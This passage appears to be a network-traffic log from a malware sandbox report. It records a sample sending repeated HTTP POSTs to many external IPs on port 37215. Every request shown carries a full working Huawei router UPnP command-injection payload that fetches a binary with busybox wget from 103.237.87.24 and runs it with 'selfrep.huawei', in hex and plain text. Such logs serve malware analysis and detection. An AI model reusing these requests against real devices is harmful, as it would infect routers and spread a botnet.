3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1788192.168.2.135907441.92.158.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538150072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1789192.168.2.1355520157.155.170.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538156033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1790192.168.2.1355800157.233.151.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538250923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1791192.168.2.1334104157.110.196.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538260937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1792192.168.2.1359196197.186.99.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538260937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1793192.168.2.1355432197.10.45.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538387060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1794192.168.2.1341772157.139.94.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538387060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1795192.168.2.1353308197.27.40.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.542323112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1796192.168.2.1333808157.67.232.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.542350054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1797192.168.2.133329641.21.150.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.542375088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1798192.168.2.1359258157.240.64.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.542391062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
